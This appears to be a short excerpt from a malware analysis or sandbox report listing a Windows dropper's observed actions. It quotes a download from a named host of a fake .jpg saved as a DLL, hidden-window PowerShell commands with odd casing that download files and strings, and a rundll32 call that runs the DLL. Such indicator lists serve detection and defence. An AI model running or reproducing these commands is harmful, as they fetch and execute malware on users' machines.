Technical Information
- http://www.zedocaixao2016.xpg.com.br/site/img001.jpg as %allusersprofile%\ysftzdfusrip_user\ysftzdfusrip_user_sfskw.dll
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objecT sysTem.neT.webclienT).downloadfile('""http://www.zedocaixao2016.xpg.com.br/site/img001.jpg','%ALLUSERSPROFILE%\ysftzdfusrip_user\ysftzdfusrip_user_sfskw.dll');sTarT-process rundll32...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-objecT neT.webclienT).downloadsTring('http://bit.ly/1HU0fAz')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %ALLUSERSPROFILE%\ysftzdfusrip_user\ysftzdfusrip_user_sfskw.dll dlgProc